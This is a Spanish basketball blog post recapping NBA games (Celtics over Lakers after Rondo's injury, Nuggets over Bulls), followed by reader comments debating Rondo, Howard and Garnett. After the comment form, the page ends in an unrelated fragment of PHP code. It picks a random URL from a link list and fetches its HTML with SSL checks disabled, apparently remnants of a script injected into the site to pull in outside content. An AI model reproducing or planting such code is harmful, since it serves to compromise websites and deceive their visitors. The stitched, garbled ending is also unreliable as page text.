La Crónica: ¿Who was Rondo?

08 de February de 2013 por txusma

6 victoria consecutiva de los Celtics desde que se lesionó Rajon Rondo. Correrán ríos de tinta intentando argumentar como puede un equipo que pierde al que era hasta ese momento su mejor jugador sobre el parqué, encadenar 6 victorias consecutivas con un estilo de juego mucho más efectivo. Lo cierto es que la intensidad defensiva se ha incrementado exponencialmente con la vuelta de Avery Bradley, que ha contagiado a sus compañeros, y el juego exterior es mucho más dinámico ahora que no hay un jugador que acapare tanto la pelota como Rondo. ¿En qué lugar queda en estos momentos?

La cuestión es que los verdes pasaron por encima de los Lakers sin excesivos problemas (95-116) en un partido en el que Garnett anotó su punto número 25000. Dwight Howard fue titular pero jugó claramente lastrado por su lesión dejando muy mal cuerpo a los aficionados amarillos y la sensación de que se puede romper en cualquier momento. Sin él, los Lakers se pueden olvidar de entrar en los Playoffs y con él a medio gas, prácticamente también. Kobe Bryant volvió a estar demasiado solo ante el peligro. A pesar de la racha de victorias, no cesan los rumores de traspaso en el vestuario céltico, rumores que Kevin Garnett no deja de acallar, al menos en cuanto a su figura se refiere. Sangra verde y sangrará verde, según él.

En el otro partido de la jornada, los Nuggets destrozaron a los Bulls con un 58% de acierto en el tiro y ya llevan 8 victorias consecutivas (96-128). A la chita callando se han colocado cuartos de la conferencia y ya tienen en el punto de mira a los Clippers. Faried hizo un roto al juego interior de Chicago y Wilson Chandler anotó los 5 triples que intentó. 

PREMIOS

MVP: Paul Pierce y Kenneth Faried, ex aequo. El primero anotó 24 puntos, capturó 6 rebotes y repartió 7 asistencias mientras que el segundo anotó 21 puntos con un 9 de 10 en tiros de campo, capturó 12 rebotes (4 ofensivos) y robo un par de balones.

Rookie: Minutos para Marcus Teague (hermano de Jeff) y actuación correcta. 10 puntos, 4 rebotes y 3 asistencias.

Sorpresa: Wilson Chandler vio ayer el aro como una piscina y anotó los 5 triples que intentó para un total de 24 puntos.

Decepción: Terribles los Bulls y muy terrible RIP Hamilton con un 1 de 7 en tiros de campo para 2 míseros puntos, los mismos que anotó Joakim Noah. Con Gasol lesionado y Howard renqueante, los Lakers necesitan que Steve Nash de un paso al frente. Ayer no fue el día y se quedó en 9 puntos y 5 asistencias.

Esfuerzo en vano: 27 puntos y 7 rebotes que palidecieron ante la marea verde. Kobe Bryant no tuvo nada que hacer.

Imágenes | AP Photos / Getty Images

Comenta

16 comentarios a esta entrada

  1. Denise dice:
    #1

    A lo mejor la racha de Boston sin Rondo es casual, pero no sería descabellado que Ainge empezara a pensar con mas fuerza el traspasar a Rondo y algun sobrepagado (Lee, Terry, Green, Bass) a cambio de unos cuantos jugadores.

    Por curiosidad…¿alguien podría decirme el balance victorias/derrotas de Lakers con los 4 fantasticos en pista?

      Citar

  2. Jose Luis dice:
    #2

    Encajar 37 puntos de los Celtics en un cuarto… 95 en tres cuartos…

    Creo que se ha acabado la temporada. Quizá sólo sea un mal partido, y vuelvan a jugar y meterse en la lucha por PO lleguen o no. Pero hoy se han dado indicios de que no, este equipo sin Gasol apenas juega, no hay juego combinativo, Kobe se siente más sólo que nunca y yo digo, hoy 8 de febrero, que no vuelven a entrar en dinámica de luchar por los PO. La lesión de Gasol es el fin de temporada de los Lakers.

    Y no me cansaré de decirlo, Howard no es jugador para jugar con Nash. Es más, casi los veo incompatibles. Nash necesita tiradores abiertos y un hombre capaz de producir un tiro en salto preciso y con elevación desde 5-6 metros y a la vez capaz de conducir asta un mate, siendo medianamente bueno en tiros libres para que no vayan a meterte el hachazo en cada jugada.

    Por otro lado, el juego de Howard, poste bajo y me lo guiso-me lo como, que tal como está de forma y salud pues no puede hacelo. Aparte, dudo mucho que una llegada de, por ejemplo, Smith o el mismo Stoudemire de hace 3 años mejorase este equipo, porque la zona estaría ocupada por el defensor de Howard, que o está en la zona o está flotado y su defensor en la zona. Para mí, son incompatibles, ya se vio cuando se unieron Nash y O’Neal. Nash necesita un tipo de jugador muy específico para funcionar a pleno rendimiento, y además tiene ya 39 años y no está para echarse un equipo a la espalda y anotar 15-20 puntos por noche.

    Malos años le tocan a los Lakers, quizá el próximo año con un Howard sano al 100% cambie un poco esta dinámica, pero sigo sin ver poder jugar bien juntos a Nash y Howard. Y les quedan 2 años juntos, de seguir ambos en Lakers.

      Citar

  3. GreenPride dice:
    #3

    Barrida de los Celtics a los Lakers en un clásico que dió muy poco de sí gracias a que los Lakers no parecen mentalmente preparados para superar la nueva lesión de Pau y la baja forma/lesión de Howard que le impide jugar a un nivel aceptable. Kobe se hartó de pasarla ante el desacierto de los demás y el barco parece hundirse ya de forma irremisible en una temporada que va camino del cataclismo. Yo ahora mismo no veo cómo van a poder llegar los amarillos a los PO, más aún teniendo en cuenta que los equipos a los que deberían superar (Houston o Utah además de Portland) están en bastante mejor momento de lo que ellos parecen estar…. y además ahora les toca visitar Miami nada menos.
    En los de Boston, el equipo parece haber aunado esfuerzos ante las baja de Rondo (y de Sullinger) y los rumores de traspaso y parecen haber decidido morir con las botas puestas. Lo cierto es que sorprendentemente la baja de Rondo ha provocado una mejora en el ataque de Boston ya que la bola no se amasa tanto desde lo alto de la bombilla, circula más y es mucho menos previsible. Además el dúo Bradley-Lee muerde en la defensa exterior provocando perdidas y saliendo veloces al contraataque lo que unido a los buenos partidos de Pierce y Garnett y a la gran aportación del banco con Green, Terry y Barbosa anotando les ha hecho encadenar estas 6 victorias consecutivas y ser ya 7º del Este. Veremos si esta mejoría es fruto de unos partidos (como les ha pasado ya antes esta temporada) o si la consolidan y tiran hacia arriba. Visto lo apretado del Este les daría tiempo todavía a situarse bien de cara a PO aunque sinceramente yo creo que sin Rondo las opciones de hacer algo sonado en PO son muy pocas. Eso sí esta mejoría puede dar una idea a Doc Rivers de lo que podría hacer cuando Rondo esté recuperado que es hacerle jugar menos minutos y con más intensidad (Rajon se protegía bastante en defensa) y pedirle quizás que se mueva más en ataque estático en vez de amasar tanto balón. De momento Boston vuelve a contar.
    Y en el Oeste cuidado con los Nuggets que tienen un equipo con muchísimos recursos. Ya son 4º, están lanzados y será difícil bajarlos de ahí y que tengan cuidado los Clippers porque visto el estado de los 2 equipos su puesto peligra. A los Bulls les pasó un tren por encima aunque siguen bien colocados a la espera de la esperadísima vuelta de Derrick Rose que podría cambiar las apuestas en toda la conferencia.

      Citar

  4. franitis dice:
    #4

    BEAT LA!!! Joder con los Celtics, cómo lo están haciendo desde la baja de RR… Ya he dicho varias veces que la obsesión por encadenar triples-dobles de Rondo podría tener mucho que ver con la racha de derrotas. Además, un gran defensor como él estaba bajando muchos enteros en el apartado defensivo también… Espero que esté viendo todos los partidos de su equipo y le sirva para darle una curita de humildad.

    Hay que tener en cuenta también la vuelta de Bradley, que no estuvo en gran parte de la racha de derrotas del equipo y estaba siendo de lo mejor antes de la misma. A ver si Green por fin la rompe con la baja de Sulli y el mal momento de Bass, que hace falta más que nunca.

    Por cierto, gran aportación de Barbosa en los últimos partidos, al cual se le rescató del olvido para tener un sustituto en el puesto de base y está haciendo una muy buena temporada.

    Y sobre los comentarios de KG sobre sus palabras y su salario… Es muy fácil hablar del dinero de los demás (cuando decís que lo que tiene que hacer es bajarse el sueldo para ayudar a su equipo…) ¿Cuántos de vosotros (los que trabajáis) estáis dispuestos a bajaros el sueldo para ayudar a vuestra empresa a superar la crisis? Tócate los huevos (con perdón de la expresión)… KG es un gran profesional, bien pagado según el rendimiento que aporta con ¡¡36 años!! y partiéndose la cara por el equipo que por fin le ha dado a un hall of famer como él la oportunidad de ganar un anillo, y sí, los Celtics son un equipo distinto, con una historia magnífica y unos valores que faltan en muchos otros equipos que cambian de nombre, de ciudad, de estilo de juego… Yo creo sus palabras y su compromiso y por supuesto si fuese él pediría a mi empresa que me pagase lo que valgo. En este caso su última renovación fue a la baja justo para ayudar a su equipo… No entiendo las críticas. Pero tampoco seamos cínicos hablando de salarios y dinero. Yo en mi puesto de trabajo me como unos “sapos” impresionantes y no estoy dispuesto a bajarme un € de salario; todo lo contrario, deberían pagarme más… Y seguro que hay muchos por debajo mía que dirán eso de “que se baje el sueldo él”, por los cojones…

      Citar

  5. Esteban dice:
    #5

    bueno, la mejora de los celtics ya habia iniciado desde el regreso de bradley, donde tambien encajaron 5 o 6 victorias consecutivas, ahora no recuerdo bien, y cuando el falto algunos juegos volvieron a una racha negativa de 5 derrotas, pero sacando ese bache, ya habian enocntrado la senda de la victoria con bradley y su defensa en pista

    me diran oportunista, pero los que han leido mis codmentarios, sabran que mi opinion sobre rondo no es la mejor, al igual que de rubio, siempre dije que por si bien dan muchas asistencias, su juego se reduce solo a eso, rondo bota bota y bota, para intentar dar una asistencia mas, no le sale naturalmente siempre, muchas veces fuerza el juego a un pase suyo y no a una fluidez ofensiva, ademas de ser un estorbo cada vez que tira al aro

    yo no rechazaria la idea de traspasar a rondo, aunque dudo que un equipo lo tome lesionado, salvo que este pensando en la proxima temporada, y de hecho su valor no me parece tan alto, podra ser el all-star que quiera, pero esta a años luz de ser un jugador franquicia o atraves del cual construir por el simple hecho que es horrible tirando al aro y no puede cerrar un juego como jugador referencia ni de coña

    por mas que garnet ame los celtics, es el quien debe salir, esta racha les da una pinta a los celtics que no es cierta, con mucha suerte y siendo muy efectivos, podrian pensar en llegar a segunda ronda, NO MAS,
    veo muy superiores los celtics al heat y a los knicks
    y si indiana recupera a granger en un nivel y en un rol que ayude, y los bulls recuperan un version buena, aunque sea saliendo como sexto hombre de ROSE, creo que los celtics no tienen absolutamente nada que hacer frente a ellos

    y eso que estoy dejando fuera de discusion a los nets, que en mi opinion, tambien vencerian en un seria a boston

    lo mejor, es sacar algo joven y a futuro por garnett si alguien lo ofrece, seria un paso para atras para dar dos para adelante,

    al jefferson? el jazz deberia recibir a otro jugador no a garnett, para eso se necesita otro equipo involucrado que este dispuesto a largar algunos jovenes que encajen en el jazz y que considere que garnett puede ayudar, los nets necesitarian a garnett pero no tienen jovenes parafrecermas que unos decepcionantes brooks y teletovic (aunque no les han dado mucho lugar)

      Citar

  6. rumbero dice:
    #6

    Esteban:
    me diran oportunista, pero los que han leido mis codmentarios, sabran que mi opinion sobre rondo no es la mejor, al igual que de rubio, siempre dije que por si bien dan muchas asistencias, su juego se reduce solo a eso, rondo bota bota y bota, para intentar dar una asistencia mas, no le sale naturalmente siempre, muchas veces fuerza el juego a un pase suyo y no a una fluidez ofensiva, ademas de ser un estorbo cada vez que tira al aro

    yo no rechazaria la idea de traspasar a rondo, aunque dudo que un equipo lo tome lesionado, salvo que este pensando en la proxima temporada, y de hecho su valor no me parece tan alto, podra ser el all-star que quiera, pero esta a años luz de ser un jugador franquicia o atraves del cual construir por el simple hecho que es horrible tirando al aro y no puede cerrar un juego como jugador referencia ni de coña

    Si al final va a resultar que Rondo es un pufo…
    Digo yo que puede haber jugadores sobre los que construir un equipo aunque no sean los mejores tiradores del mundo. Es que haciendo un poco de memoria con los PO de la temporada pasada contra Sixers y Heat uno puede recordar al bueno de Rondo echándose el equipo a la espalda y sacando partidos adelante, y no sólo botando y botando y dando asistencias sino que dirigiendo al equipo y metiendo puntos también. Vaya que me da a mi que si los Celtics le pusieran en el mercado novias no le iban a faltar por mucho que los verdes lleven un 6-0 sin él.

    Por cierto que ya hay participantes para los concursos del All-Star. ¿Habrá entrada especial o ya puedo decir que el de mates tiene muy muy buena pinta y que Bonner se va a llevar el de triples 😀 ?

      Citar

  7. Esteban dice:
    #7

    rumbero: Si al final va a resultar que Rondo es un pufo…
    Digo yo que puede haber jugadores sobre los que construir un equipo aunque no sean los mejores tiradores del mundo. Es que haciendo un poco de memoria con los PO de la temporada pasada contra Sixers y Heat uno puede recordar al bueno de Rondo echándose el equipo a la espalda y sacando partidos adelante, y no sólo botando y botando y dando asistencias sino que dirigiendo al equipo y metiendo puntos también. Vaya que me da a mi que si los Celtics le pusieran en el mercado novias no le iban a faltar por mucho que los verdes lleven un 6-0 sin él.

    Por cierto que ya hay participantes para los concursos del All-Star. ¿Habrá entrada especial o ya puedo decir que el de mates tiene muy muy buena pinta y que Bonner se va a llevar el de triples ?

    bueno reconozco que los PO de rondo fueron muy buenos, pero la final de confenrencia del heat fue una mentirilla, pasaron con sufrimiento a unos hawks que no molaban demasiado, luego sufrieron con unos sixers que estaban alli solo por la lesion de rose y noah, y por ultimo, si rindieron de buena manera frente al heat, pero vamos que no eliminaron a nadie realmente duros, incluso la final del este fue indiana vs heat, boston tuvo la serie 3-2 y miami no sudo de mas para darla vuelta

    pero mas alla de eso, rondo no es una jugador a quien darle la bola para que defina juegos, ese es pierce en boston, el es el jugador franquicia, lo ven a rondo liderando a houston en lugar de harden a PO? lo ven a rondo jugando aceptablemente bien en un equipo pesimo con los cavs en lugar de irving? puede liderar a los 76ers en lugar de holiday a PO o en lugar de jennins a los bucks?

    ronde es un exelentisimo jugador, un base de elite, pero un jugador muy particular, dbee jugar en un equipo como el que juega, con tres jugadores a quien darle la bola como allen, pierce y garnett

    como jugador franquici, liderando un proyecto no lo veo, es un jugador de rol, quiza el mejor jugador de rol de toda a nba, pero np un jugador franquicia

      Citar

  8. franitis dice:
    #8

    Coincido con Esteban, el día que Rondo desarrolle una muñeca aceptable será DIOS, pero hasta entonces necesita alguien que la hunda en la canasta… Su penetración es tremenda, su habilidad para pasar y defender, así como su dribling son acojonantes, pero su muñeca le da poca fiabilidad para jugársela.

      Citar

  9. franitis dice:
    #9

    Aunque sigo diciendo que Rondo es para mí el mejor base de la NBA, junto con Parker, que está un escalón por encima porque sí tiene muñeca…

      Citar

  10. Denise dice:
    #10

    franitis: Y sobre los comentarios de KG sobre sus palabras y su salario… Es muy fácil hablar del dinero de los demás (cuando decís que lo que tiene que hacer es bajarse el sueldo para ayudar a su equipo…) ¿Cuántos de vosotros (los que trabajáis) estáis dispuestos a bajaros el sueldo para ayudar a vuestra empresa a superar la crisis? Tócate los huevos (con perdón de la expresión)… KG es un gran profesional, bien pagado según el rendimiento que aporta con ¡¡36 años!! y partiéndose la cara por el equipo que por fin le ha dado a un hall of famer como él la oportunidad de ganar un anillo, y sí, los Celtics son un equipo distinto, con una historia magnífica y unos valores que faltan en muchos otros equipos que cambian de nombre, de ciudad, de estilo de juego… Yo creo sus palabras y su compromiso y por supuesto si fuese él pediría a mi empresa que me pagase lo que valgo. En este caso su última renovación fue a la baja justo para ayudar a su equipo… No entiendo las críticas. Pero tampoco seamos cínicos hablando de salarios y dinero. Yo en mi puesto de trabajo me como unos “sapos” impresionantes y no estoy dispuesto a bajarme un € de salario; todo lo contrario, deberían pagarme más… Y seguro que hay muchos por debajo mía que dirán eso de “que se baje el sueldo él”, por los cojones…

    Por favor…no me compares a un mileurista como somos el 85% del pais, que vive explotado por su empresa y solo va a trabajar para poder vivir dignamente con un jugador de baloncesto que vive como un rey, en su empresa lo tratan como a un rey (ya sea Garnett o el Fab Melo de turno) ….un ciudadano medio con 20.000 euros de patrimonio y una hipoteca a 40 años que le quita la mitad del sueldo no puede bajarse ni un puto euro…no me lo compares joder con un tio que habrá ganado 100 millones de dolares mas sus inversiones e intereses y que no le cuesta nada rebajarse el sueldo…ahora resulta que Garnett es Ghandi versión 2.0. por su rebaja de salario y amor a Boston….Kevin Ghandi..xD

      Citar

  11. rumbero dice:
    #11

    Si yo soy el primero que sabe que tiene una muñeca de madera pero lo que digo es que se puede liderar un proyecto sin ser el que la enchufa de todos los lados. Es que parece que sólo le des valor a esta clase de jugadores cuando es igual o más importante poder tener un tio en tu equipo que levante al equipo cuando vas 10 abajo o que tenga la vista para dársela al Horry o Fisher de turno que está en la esquina esperando para meterla. Se trata de como construyas el equipo. En los ejemplos de equipo que me pones estan hechos a partir de un PG que tiene el peso anotador del equipo, claro que ahí Rondo no pega, pero y en unos Pacers? O en Dallas? El anillo de Kidd con estos últimos o sus finales con los Nets son un buen ejemplo de ello.

    Si yo decía todo esto porque ahora parece que todos los males de los verdes vienen por Rondo y no hace demasiado uno podía leer que a Garnett le han regalado el All-Star, que Pierce está viejales y ya no mete una y que la segunda unidad es una verguenza. Ni tanto ni tan poco. El tio se ha flipado con sus triples-dobles y por pasar de las 10 asistencias y no ha estado a su mejor nivel, pero esta mejoría verde para mucho de cambio de chip.

    Para acabar, eso de que Miami no sudó para remontar la eliminatoria…Te recuerdo que tuvo que ir James al TD Garden a jugar el mejor partido de su vida (y el mejor partido de PO en los últimos 25 años) para empatar la serie. Casi nada

      Citar

  12. nba dice:
    #12

    Denise:
    Por curiosidad…¿alguien podría decirme el balance victorias/derrotas de Lakers con los 4 fantasticos en pista?

    Lo de los 4 fantasticos visto ahora en retrospectiva suena a chiste, mas bien serian los 4 “pupas”
    Bye,Bye playoffs Lakers definitivamente.
    Cuanta clase derrochan Garnett,Pierce y Bryant…

      Citar

  13. Ruxixón dice:
    #13

    Una pregunta,si fueráis Dwight Howard,¿qué hariáis este verano?Supongo que muchos diréis que si sigue D’Antoni lo mejor es que se vaya pero creo que aunque éste esté fuera,Howard está tocado desde el punto de vista de seguidor angelino,¿puede Howard liderar la franquicia en el futuro?¿aún sin D’Antoni,de verdad piensa que tendrá mucho protagonismo ofensivo en un equipo con Kobe,Nash(no congenia a nivel de juego con DH12),MWP…? No sé,entre la lesión del hombro y la dinámica de equipo hasta se le ha borrado la eterna sonrisa de su cara.Probablemente otro equipo se ponga a sus pies a costa de 2x millones menos,que sería el año de contrato extra que le podrían dar los Lakers.Compleja su decisión la verdad,yo si fuera él probablemente me iría si a si a otro equipo que gire en torno a mí y que me asegure un máximo,cosa que dudo que unos cuantos equipos no le den.

      Citar

  14. MagicJohnson32 dice:
    #14

    Denise:
    Por curiosidad…¿alguien podría decirmeel balance victorias/derrotas de Lakers con los 4 fantasticos en pista?

    Los Lakers pierden el season opener y Nash se lesiona en el 2º partido de la regular season, que también pierden. Nash es baja durante casi dos meses. Gasol es baja un par de semanas en diciembre. Pau vuelve el 18 y Nash el 22 de diciembre, y los Lakers juegan siete partidos con los “4 fantásticos”, con un balance de 3-4 (de hecho, ganan 3 de 4 y luego pierden tres seguidos). Entonces causan baja Howard y Gasol (y pierden otros tres más). Howard se pierde 3 y Gasol 5 partidos. Cuando Pau vuelve, juegan ocho partidos más juntos con un balance de 3-5.

    En total, el balance es de 6-11 con los 4 fantásticos y de 17-16 con alguno de ellos de baja. Eso sí, fíjate que nunca han jugado más de ocho partidos seguidos juntos y que, de los que juegan juntos, muchos son con Howard mal de la espalda y el hombro, y Pau con la tendinitis. No es excusa, es que realmente no hemos visto jugar a este equipo en condiciones.

    Kobe ha jugado todos los partidos, así que detallo el balance de los otros tres:

    Nash: 11-15
    Pau: 18-18
    Dwight: 20-24

      Citar

  15. franitis dice:
    #15

    Denise: Por favor…no me compares a un mileurista como somos el 85% del pais, que vive explotado por su empresa y solo va a trabajar para poder vivir dignamente con un jugador de baloncesto que vive como un rey, en su empresa lo tratan como a un rey (ya sea Garnett o el Fab Melo de turno) ….un ciudadano medio con 20.000 euros de patrimonio y una hipoteca a 40 años que le quita la mitad del sueldo no puede bajarse ni un puto euro…no me lo compares joder con un tio que habrá ganado 100 millones de dolares mas sus inversiones e intereses y que no le cuesta nada rebajarse el sueldo…ahora resulta que Garnett es Ghandi versión 2.0. por su rebaja de salario y amor a Boston….Kevin Ghandi..xD

    Denise, por supuesto que no puedo comparar a KG con ninguno de nosotros, las distancias son abismales. Me refiero a que es muy fácil hablar del salario de los demás, pero no creo yo que KG se vaya a rebajar lo que decían en uno de los comentarios del post anterior, que era una burrada; pero sí llegó a renovar a la baja para ayudar al equipo, aunque lógicamente no va a perder dinero, porque a su nivel él tampoco querrá perder un céntimo, ya que pensará que se lo ha ganado durante su carrera. Lo que quiero decir es que NADIE, ni KG ni nosotros ni Mariano Rajoy, está dispuesto a perder un duro.

      Citar

  16. Esteban dice:
    #16

    varios temas, lo de rondo lo sostengo, es un jugador de rol, quiza el mejor de la liga, como bien dicen en los pacers o en dallas seria genial, pero aun alli seguiria sin ser el jugador franquicia de esos equipos, lease jugar al lado de dirk o de george/granger, como seguna espada es genial, pero no puede liderar como cabeza de equipo, en mi opinion

    sobre howard, ah jugado tan mal este año ysu lesion fue tan grave, que habra q ver en q nivel vuelve, sin duda aun a este nivel esta en el top 3 de los pivotes de la liga, pero esta lejisimo de ser el jugador que llego a la final o incluso el de los ultimos dos años, asi q no lloraria tanto su ida si se va,

    lo dije hace un tiempo y lo repito, todos siguen esperando que howard de a poco recupere su nivel, despues de tantos partidos y lesiones continuadas, hay que plantearse la posibilidad de que howard nunca vuelva a ser el que fue, no digo que sera un bulto, pero hasta el momento no da signos de ser dominante

    tuve laoportunidad de verlo frente a mark gasol, y madre, DH12 no le hizo ni cosquillas

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>